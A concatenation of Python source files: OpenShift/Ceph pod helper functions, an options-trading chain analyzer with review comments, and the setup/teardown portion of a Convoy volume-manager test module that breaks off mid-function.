            state.
        exclude_state (str): A resource state to ignore
    """
    for pod_obj in dc_pod_obj:
        name_label = pod_obj.get_labels().get("name")
        # Re-list the pods for this DC, waiting for failover to settle.
        for dc_pod in get_all_pods(selector_label=f"name={name_label}", wait=True):
            if "-1-deploy" in dc_pod.name or dc_pod.status == exclude_state:
                continue
            helpers.wait_for_resource_state(
                dc_pod, constants.STATUS_RUNNING, timeout=timeout
            )
def delete_deploymentconfig_pods(pod_obj):
    """
    Delete a DeploymentConfig pod and all the pods that are controlled by it.

    Args:
        pod_obj (Pod): Pod object
    """
    dc_name = pod_obj.get_labels().get("name")
    dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace)
    dc_items = dc_ocp_obj.get().get("items")
    if dc_items:
        for dc_data in dc_items:
            # Delete only the DC whose name matches this pod's "name" label
            if dc_data.get("metadata").get("name") == dc_name:
                dc_ocp_obj.delete(resource_name=dc_name)
                dc_ocp_obj.wait_for_delete(resource_name=dc_name)
def wait_for_new_osd_pods_to_come_up(number_of_osd_pods_before):
    """
    Wait (up to 180s) until at least one newly added osd pod starts coming up.

    Args:
        number_of_osd_pods_before (int): osd pod count before the new ones
            were added; pods beyond this index are treated as new
    """
    expected_statuses = [
        "Init:1/4",
        "Init:2/4",
        "Init:3/4",
        "PodInitializing",
        "Running",
    ]
    try:
        for osd_pods in TimeoutSampler(timeout=180, sleep=3, func=get_osd_pods):
            # Check if the new osd pods has started to come up
            new_pods = osd_pods[number_of_osd_pods_before:]
            if any(pod.status() in expected_statuses for pod in new_pods):
                logging.info("One or more of the new osd pods has started to come up")
                break
    except TimeoutExpiredError:
        logging.warning("None of the new osd pods reached the desired status")
def get_pod_restarts_count(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
    """
    Gets the dictionary of pod and its restart count for all the pods in a
    given namespace.

    Returns:
        dict: mapping of pod name to its corresponding restart count
    """
    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    restart_dict = {}
    # osd-prepare and drain-canary pods are excluded because they get created
    # freshly whenever an osd needs to be added.
    skip_markers = ("rook-ceph-osd-prepare", "rook-ceph-drain-canary")
    for p in get_all_pods(namespace):
        if not any(marker in p.name for marker in skip_markers):
            restart_dict[p.name] = int(ocp_pod_obj.get_resource(p.name, "RESTARTS"))
    logging.info(f"get_pod_restarts_count: restarts dict = {restart_dict}")
    return restart_dict
def check_pods_in_running_state(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
    """
    Checks whether all the pods in a given namespace are in Running state.

    Args:
        namespace (str): namespace whose pods are checked

    Returns:
        Boolean: True, if all pods in Running state. False, otherwise
    """
    ret_val = True
    list_of_pods = get_all_pods(namespace)
    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    for p in list_of_pods:
        # Skip osd-prepare and drain-canary pods as they get created freshly
        # when an osd needs to be added, and skip debug pods. The original
        # code had two overlapping `if` blocks that fetched the STATUS twice;
        # they are merged into one condition with a single get_resource call.
        if (
            "rook-ceph-osd-prepare" not in p.name
            and "rook-ceph-drain-canary" not in p.name
            and "debug" not in p.name
        ):
            status = ocp_pod_obj.get_resource(p.name, "STATUS")
            # Use equality instead of the previous `status not in "Running"`
            # substring test, which would wrongly accept statuses such as
            # "Run" that are substrings of "Running".
            if status != "Running":
                logging.error(
                    f"The pod {p.name} is in {status} state. Expected = Running"
                )
                ret_val = False
    return ret_val
def get_running_state_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
    """
    Checks the running state pods in a given namespace.

    Returns:
        List: all the pod objects that are in running state only
    """
    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    return [
        pod
        for pod in get_all_pods(namespace)
        if "Running" in ocp_pod_obj.get_resource(pod.name, "STATUS")
    ]
def wait_for_pods_to_be_running(timeout=200, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
    """
    Wait for all the pods in a specific namespace to be running.

    Args:
        timeout (int): time to wait for pods to be running
        namespace (str): the namespace ot the pods

    Returns:
        bool: True, if all pods in Running state. False, otherwise
    """
    sampler = TimeoutSampler(
        timeout=timeout,
        sleep=10,
        func=check_pods_in_running_state,
        namespace=namespace,
    )
    try:
        for all_running in sampler:
            # Stop sampling as soon as every pod reports Running
            if all_running:
                logging.info("All the pods reached status running!")
                return True
    except TimeoutExpiredError:
        logging.warning(
            f"Not all the pods reached status running " f"after {timeout} seconds"
        )
        return False
def list_of_nodes_running_pods(selector, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
    """
    Returns the deduplicated list of nodes running the given selector's pods.

    Args:
        selector (str): The resource selector to search with

    Returns:
        list: a list of nodes that runs the given selector pods
    """
    matching_pods = get_all_pods(namespace=namespace, selector=[selector])
    pods_running_nodes = [get_pod_node(pod) for pod in matching_pods]
    logger.info(f"{selector} running on nodes {pods_running_nodes}")
    return list(set(pods_running_nodes))
def get_osd_removal_pod_name(osd_id, timeout=60):
    """
    Get the osd removal pod name.

    Args:
        osd_id (int): The osd's id to get the osd removal pod name
        timeout (int): The time to wait for getting the osd removal pod name

    Returns:
        str: The osd removal pod name, or None when not found within timeout
    """
    sampler = TimeoutSampler(
        timeout=timeout,
        sleep=5,
        func=get_pod_name_by_pattern,
        pattern=f"ocs-osd-removal-{osd_id}",
    )
    try:
        for candidate_names in sampler:
            if candidate_names:
                found_name = candidate_names[0]
                logging.info(f"Found pod {found_name}")
                return found_name
    except TimeoutExpiredError:
        logger.warning(f"Failed to get pod ocs-osd-removal-{osd_id}")
        return None
def check_toleration_on_pods(toleration_key=constants.TOLERATION_KEY):
    """
    Check and log, per pod, whether the given toleration key is present.

    Args:
        toleration_key (str): The toleration key to check
    """
    pod_objs = get_all_pods(
        namespace=defaults.ROOK_CLUSTER_NAMESPACE,
        selector=[constants.TOOL_APP_LABEL],
        exclude_selector=True,
    )
    for pod_obj in pod_objs:
        resource_name = pod_obj.name
        tolerations = pod_obj.get().get("spec").get("tolerations")
        # Evaluate the toleration independently for each pod. The previous
        # implementation kept a single flag across the whole loop, so once
        # one pod had the toleration, every later pod (even without it) was
        # reported as having it.
        if any(toleration["key"] == toleration_key for toleration in tolerations):
            logger.info(f"The Toleration {toleration_key} exists on {resource_name}")
        else:
            logger.error(
                f"The pod {resource_name} does not have toleration {toleration_key}"
            )
def run_osd_removal_job(osd_id):
    """
    Run the ocs-osd-removal job.

    Args:
        osd_id (str): The osd id

    Returns:
        ocs_ci.ocs.resources.ocs.OCS: The ocs-osd-removal job object
    """
    # Compare the OCP version numerically by (major, minor). The previous
    # float(get_ocp_version()) comparison breaks for double-digit minors:
    # "4.10" parses as 4.1 and wrongly sorts below 4.6.
    version_parts = get_ocp_version().split(".")
    major, minor = int(version_parts[0]), int(version_parts[1])
    if (major, minor) >= (4, 6):
        cmd = f"process ocs-osd-removal -p FAILED_OSD_IDS={osd_id} -o yaml"
    else:
        cmd = f"process ocs-osd-removal -p FAILED_OSD_ID={osd_id} -o yaml"
    logger.info(f"Executing OSD removal job on OSD-{osd_id}")
    ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
    osd_removal_job_yaml = ocp_obj.exec_oc_cmd(cmd)
    osd_removal_job = OCS(**osd_removal_job_yaml)
    osd_removal_job.create(do_reload=False)
    return osd_removal_job
def verify_osd_removal_job_completed_successfully(osd_id):
    """
    Verify that the ocs-osd-removal job completed successfully.

    Args:
        osd_id (str): The osd id

    Returns:
        bool: True, if the ocs-osd-removal job completed successfully.
            False, otherwise
    """
    logger.info("Getting the ocs-osd-removal pod name")
    removal_pod_name = get_osd_removal_pod_name(osd_id)
    removal_pod_obj = get_pod_obj(
        removal_pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    job_completed = removal_pod_obj.ocp.wait_for_resource(
        condition=constants.STATUS_COMPLETED, resource_name=removal_pod_name
    )
    if not job_completed:
        logger.info("ocs-osd-removal pod job failed to complete")
        return False
    # Verify OSD removal from the ocs-osd-removal pod logs
    logger.info(f"Verifying removal of OSD from {removal_pod_name} pod logs")
    pod_logs = get_pod_logs(removal_pod_name)
    if re.search(f"purged osd.{osd_id}", pod_logs):
        return True
    logger.warning(
        f"Didn't find the removal of OSD from {removal_pod_name} pod logs"
    )
    return False
def delete_osd_removal_job(osd_id):
    """
    Delete the ocs-osd-removal job.

    Args:
        osd_id (str): The osd id

    Returns:
        bool: True, if the ocs-osd-removal job deleted successfully.
            False, otherwise
    """
    job_name = f"ocs-osd-removal-{osd_id}"
    osd_removal_job = get_job_obj(job_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
    osd_removal_job.delete()
    try:
        osd_removal_job.ocp.wait_for_delete(resource_name=job_name)
    except TimeoutError:
        logger.warning(f"ocs-osd-removal-{osd_id} job did not deleted successfully")
        return False
    return True
def get_deployment_name(pod_name):
    """
    Get the deployment name of the pod by stripping the last two
    dash-separated components (replica-set hash and pod suffix).

    Args:
        pod_name (str): The pod's name.

    Returns:
        The deployment of the specific pod name
    """
    name_parts = pod_name.split("-")
    return "-".join(name_parts[:-2])
def get_osd_pod_id(osd_pod):
    """
    Get the osd pod id from the pod's "ceph-osd-id" label.

    Args:
        osd_pod (ocs_ci.ocs.resources.pod.Pod): The osd pod object

    Returns:
        str: The osd pod id
    """
    metadata = osd_pod.get().get("metadata")
    return metadata.get("labels").get("ceph-osd-id")
|
analyzer.py | # -*- coding: UTF-8 -*-
import math
import time
import queue
import threading
from multiprocessing import Pool, TimeoutError
from optionstrader.database import Database
from optionstrader.config import Config
from optionstrader.customlogging import CustomLog
from optionstrader.customlogging import Analyzed_Ticker_Stream
class Analyzer:
    """Analyzes stored option chains and writes per-scenario analysis
    results back through the Database module.

    The analysis loop pulls recent option chains per ticker, computes a
    set of "what if the stock rises X%" scenarios for each chain, and
    persists each scenario via update_option_chain_with_analysis().
    """

    def __init__(self):
        # Project collaborators: DB access, configuration, and two loggers
        # (general debug log plus a dedicated analyzed-ticker stream).
        self.database = Database()
        self.config = Config()
        self.log = CustomLog()
        self.log_analysis = Analyzed_Ticker_Stream()
        self.minimum_contract_cost_threshold = self.config.get_minimum_contract_cost_threshold()
        # config
        # Max number of option chains to analyze, per symbol
        self.max_num_option_chains = 500
        # About 3.5 days in seconds = 302400
        self.option_chain_timestamp_threshold = 300000
        # Queue of analysis dicts awaiting DB persistence (see
        # add_to_db_update_queue / save_to_db).
        self.db_update_queue = queue.Queue()

    # Decorator to time each method
    # Will be used for future optimization
    # NOTE: defined without `self` on purpose; it is applied as @timeit to
    # methods inside this class body (args[0] is the instance, args[1] the
    # ticker symbol).
    def timeit(method):
        def timed(*args, **kw):
            ts = time.time()
            result = method(*args, **kw)
            # args[1] is the ticker argument of the decorated method
            ticker = args[1]
            te = time.time()
            completion_time_ms = round(te-ts, 4)*1000
            completion_time_mcs = round(te-ts, 4)*1000000
            avg_one_option_analyzed_time = -1
            # NOTE(review): `is -1` relies on CPython small-int caching;
            # `result == -1` would be the safe comparison — confirm intent.
            if result is -1:
                log_msg = "Warning: Wasting resources. Symbol '{ticker}' does not have option chains.".format(ticker=ticker)
                log = CustomLog()
                log.debug(log_msg)
                return result
            if result is not -1: avg_one_option_analyzed_time = completion_time_mcs / result
            log_msg = "Completed in {completion_time_ms} ms - analyzer.{0}(ticker='{ticker}'). Avg 1 option scanned in {avg_one_option_analyzed_time} microseconds".format(
                method.__name__,
                completion_time_ms=completion_time_ms,
                ticker=ticker,
                avg_one_option_analyzed_time=avg_one_option_analyzed_time)
            log = CustomLog()
            log.debug(log_msg)
            return result
        return timed

    def save_to_db(self):
        """Pop one queued analysis item and return it.

        NOTE(review): despite the name, this does not persist anything —
        it only dequeues. db_update_queue.get() blocks when the queue is
        empty; confirm whether a DB write was intended here.
        """
        queue_item = self.db_update_queue.get()
        log_msg = queue_item
        return log_msg

    def start_db_update_queue_workers(self):
        """Spawn a process pool intended to drain the DB update queue.

        NOTE(review): apply_async is called once (not per queue item) and
        its result is never awaited; looks like scaffolding for future
        async persistence rather than finished functionality.
        """
        processes = 10
        pool = Pool(processes)
        log_msg = "TESTING"
        self.log.debug(log_msg)
        log_msg = "Starting pool of {} processes".format(processes)
        self.log.debug(log_msg)
        result = pool.apply_async(self.save_to_db)
        self.log.debug(log_msg)
        return True

    def get_final_analysis(self, percentage_change, magic_number):
        """Placeholder — not implemented yet (returns None)."""
        # We want to return the results for each possible_expiration_dates
        # Example: We want to return the results of the provided parameters for
        #          the week of 02/17/2017 and for the week of 02/24/2017, if
        #          possible_expiration_dates had only those two dates in it.
        return

    def sanitize_stock_price(self, symbol):
        """Return the current stock price for `symbol` from the database.

        Currently performs no sanitization (see TODO below).
        """
        # TODO
        # Implement later
        # I'll use this function to ensure that the stock price is not widly
        # above or below the current stock price.
        stock_price = self.database.get_current_stock_price(symbol)
        return stock_price

    def analyze_all_option_chains(self):
        """Analyze the option chains of every ticker that has options."""
        # There's two ways to analyze all option chains
        # - inside_out: Scans for option chains for the earliest option expiration date, then goes outwards.
        #               Scan start with the AAAA ends with ZZZZ.
        # - outside_in: Scans for option chains for the farthest option expiration date (set limit manually Eg- 6 months out),
        #               then goes inwards. Scan start with the AAAA ends with ZZZZ.
        # We will later want the ability to prioritize the scan of the option chains of specific companies.
        # We need to speed up this process by 2 orders of magnitude.
        # Goal: 1.65 sec for maximum_number_of_option_chains=10, option_chain_timestamp_threshold=30000
        list_of_tickers = self.database.get_list_of_tickers(query_type='options_only')
        log_msg = "Number of DISTINCT symbols to analyze: {0}".format(len(list_of_tickers))
        for ticker in list_of_tickers:
            self.analyze_all_option_chains_for_ticker(ticker)
        return True

    @timeit
    def analyze_all_option_chains_for_ticker(self, ticker, *args):
        """Analyze every recent option chain for one ticker.

        Returns:
            int: -1 when the ticker has no chains (the timeit wrapper logs
            a warning for that case), otherwise the number of chains found.
        """
        current_timestamp = int(time.time())
        time_threshold = self.option_chain_timestamp_threshold
        max_num_option_chains = self.max_num_option_chains
        # Improve efficiency here
        option_chains = self.database.query_option_chains_for_analysis(ticker,
                                                                       current_timestamp,
                                                                       time_threshold,
                                                                       max_num_option_chains)
        num_option_chains = len(option_chains)
        log_msg = "{0} chains for symbol '{1}', time_threshold : {2}, max_num_option_chains : {3}".format(
            num_option_chains,
            ticker,
            time_threshold,
            max_num_option_chains)
        self.log.debug(log_msg)
        # Improve efficiency here
        result = self.analyze_option_chains(option_chains)
        if num_option_chains <= 0: return -1
        # returning the num_option_chains so that performance can be tuned.
        return num_option_chains
        #except:
        #    log_msg = "ERROR Processing option_chain for ticker {0}".format(ticker)
        #    return False

    def async_analyze_option_chains(self, option_chains):
        """Thread-target placeholder — currently a no-op."""
        return

    def analyze_option_chains(self, option_chains):
        """Dispatch option-chain analysis onto worker threads.

        NOTE(review): the threads target async_analyze_option_chains,
        which is a no-op, the while loop `break`s after one batch, and
        everything after `return False` is unreachable scaffolding for a
        sequential fallback. Also, queue.get() blocks if fewer than 16
        items remain — confirm before relying on this path.
        """
        # option_chains is a list of all option chains for a given ticker,
        # sorted by timestamp in descending order
        # Spawn a new thread
        #while option_chains
        #for option_chain in option_chains:
        #pass
        option_chain_queue = queue.Queue()
        for option_chain in option_chains:
            option_chain_queue.put(option_chain)
        while option_chain_queue.qsize() > 0:
            max_number_threads = 16
            for i in range(max_number_threads):
                thread = threading.Thread(target=self.async_analyze_option_chains, args=(option_chain_queue.get(),))
                thread.start()
            # All 8 threads have completed the job
            break
        return False
        # --- unreachable sequential fallback below (kept intentionally) ---
        for option_chain in option_chains:
            result = self.analyze_single_option_chain(option_chain)
            if result == False:
                # There was an error analyzing option chain 'option_chain'
                log_msg = "Error! There was an error analyzing option chain "
                self.log.debug(log_msg)
                # Change later
                raise SyntaxError
                return False
        # main thread
        # poll to ensure that the other threads are executing properly
        return True

    def analyze_single_option_chain(self, option_chain):
        """Compute what-if scenarios for one option chain and persist them.

        For each stock-price-increase percentage, builds a
        percentage_increase_analysis dict (exercise price, contract value,
        "magic number" ratio, and profit/risk figures for 1/10/100
        contracts) and writes it to the database.
        """
        # Currently using the ask price for the option chain in analysis
        #log_msg = "type(option_chain) : {}".format(type(option_chain))
        # First analyze for each percentage Increase
        # Then analyze examples for each number contracts array
        # We want to make sure that the 'last_' price is within reason. We don't want to
        # pay 100x the average price of the item.
        symbol = option_chain['underlying']
        #self.log.debug("SYMBOL: {}".format(symbol))
        current_stock_price = self.sanitize_stock_price(symbol)
        #self.log.debug("current_stock_price: {}".format(current_stock_price))
        # strike_price = float(option_chain['strikePrice'])
        strike_price = option_chain['strike']
        #log_msg = "Strike Price: {}".format(option_chain['strike'])
        # for calulating the price per contract, we should take into consideration both the bid and the ask
        price_per_contract_bid = float(option_chain['bid'])
        price_per_contract_ask = float(option_chain['ask'])
        #log_msg = "price_per_contract_bid: {}".format(price_per_contract_bid)
        #log_msg = "price_per_contract_ask: {}".format(price_per_contract_ask)
        # iterate for each of these thresholds
        stock_price_increase_total = [1.0, 1.5, 2.0, 2.25, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0]
        for stock_price_increase in stock_price_increase_total:
            percentage_increase_analysis = {}
            percentage_increase_analysis['timestamp'] = time.time()
            #log_msg = "timestamp: {}".format(time.time())
            percentage_increase_analysis['expiration_date'] = option_chain['expiration_date']
            percentage_increase_analysis['symbol'] = symbol
            #log_msg = "symbol: {}".format(symbol)
            percentage_increase_analysis['option_type'] = option_chain['option_type']
            percentage_increase_analysis['stock_price_increase'] = stock_price_increase
            #log_msg = "stock_price_increase: {}".format(stock_price_increase)
            stock_exercise_price = current_stock_price * (1 + (float(stock_price_increase)/100))
            percentage_increase_analysis['stock_exercise_price'] = stock_exercise_price
            #log_msg = "stock_exercise_price: {}".format(stock_exercise_price)
            #log_msg = stock_exercise_price
            # NOTE(review): math.pow(3,33) ~= 5.56e15 appears here and in the
            # magic_number formula below; the factors cancel there, but the
            # intent of this constant is unclear — confirm it was not meant
            # to be a per-contract multiplier (e.g. 100).
            theoretical_commission_fees = 0.35 * math.pow(3,33)
            contract_price_per_share = stock_exercise_price - strike_price
            if contract_price_per_share < 0:
                contract_price_per_share = 0
            # This is the potential value of the contract near the expiration date.
            # This is the price that the option should be sold at
            percentage_increase_analysis['contract_price_per_share'] = contract_price_per_share
            #log_msg = "contract_price_per_share: {}".format(contract_price_per_share)
            # This is the price per contract that the analysis was performed at
            # This is how much the user should buy the contract for
            percentage_increase_analysis['price_per_contract_ask'] = price_per_contract_ask
            #magic_number = contract_price_per_share
            try:
                magic_number = ((contract_price_per_share * math.pow(3,33)) - ((price_per_contract_ask * math.pow(3,33))-(theoretical_commission_fees)))/(price_per_contract_ask * math.pow(3,33))
            except:
                # division by zero when the ask is 0; sentinel value
                magic_number = -100
            percentage_increase_analysis['magic_number'] = magic_number
            #log_msg = "magic_number: {}".format(magic_number)
            # Potential Profit
            percentage_increase_analysis['strike_price'] = strike_price
            #log_msg = "strike_price: {}".format(strike_price)
            number_contracts_array = [1, 10, 100]
            for total_number_of_contracts in number_contracts_array:
                #log_msg = "---"
                #total_number_of_contracts = 1
                total_number_of_shares = total_number_of_contracts * 100
                total_price_paid = price_per_contract_ask * total_number_of_shares
                percentage_increase_analysis['total_price_paid_{0}x'.format(total_number_of_contracts)] = total_price_paid
                #log_msg = "total_price_paid_{0}x: {1}".format(total_number_of_contracts, total_price_paid)
                # Commission model: $0.35/contract with a $5.00 minimum
                # (threshold comes from config).
                if (0.35 * total_number_of_contracts) < self.minimum_contract_cost_threshold:
                    total_commission_cost = 5.00
                else:
                    total_commission_cost = 0.35 * total_number_of_contracts
                # NOTE(review): this branch compares against the *ask*-based
                # value, while the else-branch profit uses
                # contract_price_per_share — confirm the condition's operand.
                if ((price_per_contract_ask * total_number_of_shares) - total_price_paid - total_commission_cost) > 0:
                    potential_profit = 0
                else:
                    potential_profit = (contract_price_per_share * total_number_of_shares) - total_price_paid - total_commission_cost
                percentage_increase_analysis['potential_profit_{0}x'.format(total_number_of_contracts)] = potential_profit
                #log_msg = "potential_profit_{0}x : {1}".format(total_number_of_contracts, potential_profit)
                try:
                    risk_percentage = round((total_price_paid / potential_profit) * 100, 2)
                except:
                    # division by zero when potential_profit is 0; sentinel
                    risk_percentage = -100.0
                percentage_increase_analysis['risk_percentage_{0}x'.format(total_number_of_contracts)] = risk_percentage
                #log_msg = "risk_percentage_{0}x : {1}".format(total_number_of_contracts, risk_percentage)
            # uncomment below for all percentage_increase
            #log_msg = "------------------"
            #log_msg = percentage_increase_analysis
            # update database
            # TODO
            #self.add_to_db_update_queue(percentage_increase_analysis)
            self.database.update_option_chain_with_analysis(percentage_increase_analysis)
            # percentage_increase_analysis is the variable used to determine if the choice is good or not
            #self.log.debug("percentage_increase_analysis:")
            #self.log.debug(percentage_increase_analysis)
            # Uncommenting until further testing has been done. TODO finish this part.
            # TODO finish the analysis part
            #self.get_recommended_option_purchase(percentage_increase_analysis)
        return True

    def get_recommended_option_purchase(self, percentage_increase_analysis):
        """Filter an analysis dict against hard-coded "good match" ranges.

        Returns the dict when every criterion passes, otherwise None.
        """
        # There is similar code in the database.py module
        # This is used for analyzing the datastream to check if an option_chain
        # meets certain criteria for a "good" match
        #self.log.debug("Checking percentage_increase_analysis...")
        if (0 <= percentage_increase_analysis['total_price_paid_1x'] <= 100) == False:
            return None
        if (50 <= percentage_increase_analysis['potential_profit_1x'] <= 100) == False:
            return None
        if (0 <= percentage_increase_analysis['stock_price_increase'] <= 3.5) == False:
            return None
        if (3 <= percentage_increase_analysis['magic_number'] <= 10) == False:
            return None
        if (0 <= percentage_increase_analysis['risk_percentage_1x'] <= 18) == False:
            return None
        # If the option_chain has made it through this tribunal, I want to know about it
        #
        self.log.debug("Preferred Analysis Detected in percentage_increase_analysis!")
        self.log.debug("Sending details to analysis log...")
        self.log_analysis.debug("PREFERRED ANALYSIS DETECTED".center(50, "-"))
        self.log_analysis.debug(percentage_increase_analysis)
        return percentage_increase_analysis

    def add_to_db_update_queue(self, percentage_increase_analysis):
        """Enqueue an analysis dict for later persistence (see save_to_db)."""
        #self.database.update_option_chain_with_analysis(percentage_increase_analysis)
        self.db_update_queue.put(percentage_increase_analysis)
        return True
|
test_main.py | #!/usr/bin/python
import subprocess
import os
import json
import pytest
import uuid
import time
import sys
import threading
import shutil
from convoy import VolumeManager
# --- Test environment layout (wiped and recreated by setup_module) ----------
TEST_ROOT = "/tmp/convoy_test/"
CFG_ROOT = os.path.join(TEST_ROOT, "convoy")
PID_FILE = os.path.join(TEST_ROOT, "convoy.pid")
LOG_FILE= os.path.join(TEST_ROOT, "convoy.log")
TEST_SNAPSHOT_FILE = "snapshot.test"
# --- Daemon invocation: either inside a container or as a local binary ------
CONTAINER_NAME = "convoy-test"
CONTAINER = "yasker/convoy"
CONVOY_CONTAINER_CMD = ["docker", "exec", CONTAINER_NAME, "convoy"]
CONVOY_BINARY = [os.path.abspath("../../bin/convoy")]
# --- Devicemapper driver configuration --------------------------------------
DM = "devicemapper"
DM_ROOT = os.path.join(CFG_ROOT, DM)
TEST_THREAD_COUNT = 100
TEST_LOOP_COUNT = 100
# --- VFS driver configuration -----------------------------------------------
VFS_BACKUP_DIR = os.path.join(TEST_ROOT, "Backup")
VFS_DEST = "vfs://" + VFS_BACKUP_DIR
VFS = "vfs"
VFS_ROOT = os.path.join(CFG_ROOT, VFS)
VFS_VOLUME_PATH = os.path.join(TEST_ROOT, "vfs-volumes")
# --- EBS driver (only exercised with --ebs) ---------------------------------
EBS = "ebs"
ENV_TEST_AWS_REGION = "CONVOY_TEST_AWS_REGION"
ENV_TEST_AWS_BUCKET = "CONVOY_TEST_AWS_BUCKET"
S3_PATH = "test/volume/"
DD_BLOCK_SIZE = 4096
# --- Loopback-backed thin pool sizing (bytes) -------------------------------
POOL_NAME = "convoy_test_pool"
DATA_FILE = "data.vol"
METADATA_FILE = "metadata.vol"
DATA_DEVICE_SIZE = 2147483648
METADATA_DEVICE_SIZE = 52428800
DM_DIR = "/dev/mapper"
DM_BLOCK_SIZE = 2097152
EMPTY_FILE_SIZE = 104857600
# --- Volume sizes used by the tests (strings as passed on the CLI) ----------
DEFAULT_VOLUME_SIZE = "1073741824"
VOLUME_SIZE_IOPS = "5G"
VOLUME_IOPS = "100"
VOLUME_SIZE_BIG_Bytes = "2147483648"
VOLUME_SIZE_BIG = "2G"
VOLUME_SIZE_SMALL = "1073741824"
VOLUME_SIZE_6M = "6M"
EBS_DEFAULT_VOLUME_TYPE = "standard"
VM_IMAGE_FILE = "disk.img"
# --- Mutable module state: set by setup_module, drained at teardown ---------
data_dev = ""
metadata_dev = ""
mount_cleanup_list = []
dm_cleanup_list = []
volume_cleanup_list = []
test_ebs = False
test_container = False
def create_empty_file(filepath, size):
    # Create (or resize) a sparse file of the requested size via truncate.
    subprocess.check_call(["truncate", "-s", str(size), filepath])
    assert os.path.exists(filepath)
def attach_loopback_dev(filepath):
    # Attach the file to the first free loop device and return its path
    # (the device name is the 4th whitespace token of losetup -v output).
    output = subprocess.check_output(["losetup", "-v", "-f", filepath])
    dev = output.strip().split(" ")[3]
    assert dev.startswith("/dev/loop")
    return dev
def detach_loopback_dev(dev):
    # Release the loop device so the backing file can be removed.
    subprocess.check_output(["losetup", "-d", dev])
def mount_dev(dev, mountpoint):
    # Mount the device and remember the mountpoint for teardown.
    subprocess.check_call(["mount", dev, mountpoint])
    mount_cleanup_list.append(mountpoint)
def umount_dev(mountpoint):
    # Unmount and drop the mountpoint from the teardown list.
    subprocess.check_call(["umount", mountpoint])
    mount_cleanup_list.remove(mountpoint)
def setup_module():
    # Build the whole test environment, in order: read pytest options,
    # recreate TEST_ROOT, create loopback-backed data/metadata devices for
    # the devicemapper driver, then start the convoy daemon (container or
    # local binary) with DM + VFS (and optionally EBS) drivers enabled.
    global test_ebs
    test_ebs = pytest.config.getoption("ebs")
    global test_container
    test_container = pytest.config.getoption("container")
    if os.path.exists(TEST_ROOT):
        subprocess.check_call(["rm", "-rf", TEST_ROOT])
    os.makedirs(TEST_ROOT)
    assert os.path.exists(TEST_ROOT)
    os.makedirs(VFS_BACKUP_DIR)
    assert os.path.exists(VFS_BACKUP_DIR)
    # Sparse files attached as loop devices back the DM thin pool
    data_file = os.path.join(TEST_ROOT, DATA_FILE)
    create_empty_file(data_file, DATA_DEVICE_SIZE)
    global data_dev
    data_dev = attach_loopback_dev(data_file)
    metadata_file = os.path.join(TEST_ROOT, METADATA_FILE)
    create_empty_file(metadata_file, METADATA_DEVICE_SIZE)
    global metadata_dev
    metadata_dev = attach_loopback_dev(metadata_file)
    # `v` is the module-global VolumeManager handle used by every test
    global v
    cmdline = []
    if test_container:
        v = VolumeManager(CONVOY_CONTAINER_CMD, TEST_ROOT)
        cmdline = ["convoy-start",
                   "--mnt-ns", "/host/proc/1/ns/mnt"]
    else:
        v = VolumeManager(CONVOY_BINARY, TEST_ROOT)
        cmdline = ["daemon"]
    cmdline += [
        "--root", CFG_ROOT,
        "--log", LOG_FILE,
        "--drivers=" + DM,
        "--driver-opts", "dm.datadev=" + data_dev,
        "--driver-opts", "dm.metadatadev=" + metadata_dev,
        "--driver-opts", "dm.thinpoolname=" + POOL_NAME,
        "--driver-opts", "dm.defaultvolumesize=" + DEFAULT_VOLUME_SIZE,
        "--drivers=" + VFS,
        "--driver-opts", "vfs.path=" + VFS_VOLUME_PATH]
    if test_ebs:
        cmdline += ["--drivers=ebs",
                    "--driver-opts",
                    "ebs.defaultvolumesize=" + DEFAULT_VOLUME_SIZE,
                    "--driver-opts",
                    "ebs.defaultvolumetype=" + EBS_DEFAULT_VOLUME_TYPE]
    if test_container:
        v.start_server_container(CONTAINER_NAME, CFG_ROOT, TEST_ROOT, CONTAINER, cmdline)
    else:
        v.start_server(PID_FILE, cmdline)
    # The pool must be torn down with dmsetup even if no test registers it
    dm_cleanup_list.append(POOL_NAME)
    wait_for_daemon()
def detach_all_lodev(keyword):
    # Detach every loop device whose losetup entry mentions `keyword`
    # (the device path is the text before the first colon).
    listing = subprocess.check_output(["losetup", "-a"])
    for entry in listing.splitlines():
        if entry.find(keyword) != -1:
            detach_loopback_dev(entry.split(":")[0].strip())
def teardown_module():
    # Best-effort teardown: each step logs and continues on failure so
    # later cleanup still runs. Order matters: stop the daemon, unmount,
    # remove DM devices and the pool, then detach loop devices.
    if test_container:
        code = v.stop_server_container(CONTAINER_NAME)
    else:
        code = v.stop_server(PID_FILE)
    if code != 0:
        print "Something wrong when tearing down, continuing with code ", code
    while mount_cleanup_list:
        code = subprocess.call(["umount", mount_cleanup_list.pop()])
        if code != 0:
            print "Something wrong when tearing down, continuing with code", code
    while dm_cleanup_list:
        code = subprocess.call(["dmsetup", "remove", "--retry",
                                dm_cleanup_list.pop()])
        if code != 0:
            print "Something wrong when tearing down, continuing with code ", code
    # Remove the thin pool explicitly (it may already be gone via the list)
    code = subprocess.call(["dmsetup", "remove", "--retry", POOL_NAME])
    if code != 0:
        print "Something wrong when tearing down, continuing with code ", code
    code = subprocess.call(["losetup", "-d", data_dev, metadata_dev])
    if code != 0:
        print "Something wrong when tearing down, continuing with code", code
    detach_all_lodev(TEST_ROOT)
def wait_for_daemon():
    # Poll the daemon until `info` succeeds, then sanity-check the reported
    # configuration; tears the module down and fails hard on any mismatch.
    while True:
        try:
            data = v.server_info()
            break
        except subprocess.CalledProcessError:
            print "Fail to communicate with daemon"
            # Distinguish "still starting" from "crashed": if the server
            # process is gone, abort the whole module.
            check_result = 0
            if test_container:
                check_result = v.check_server_container(CONTAINER_NAME)
            else:
                check_result = v.check_server(PID_FILE)
            if check_result != 0:
                print "Server failed to start"
                teardown_module()
                assert False
            time.sleep(1)
    info = json.loads(data)
    # Verify the daemon reports the exact configuration we started it with
    success = True
    try:
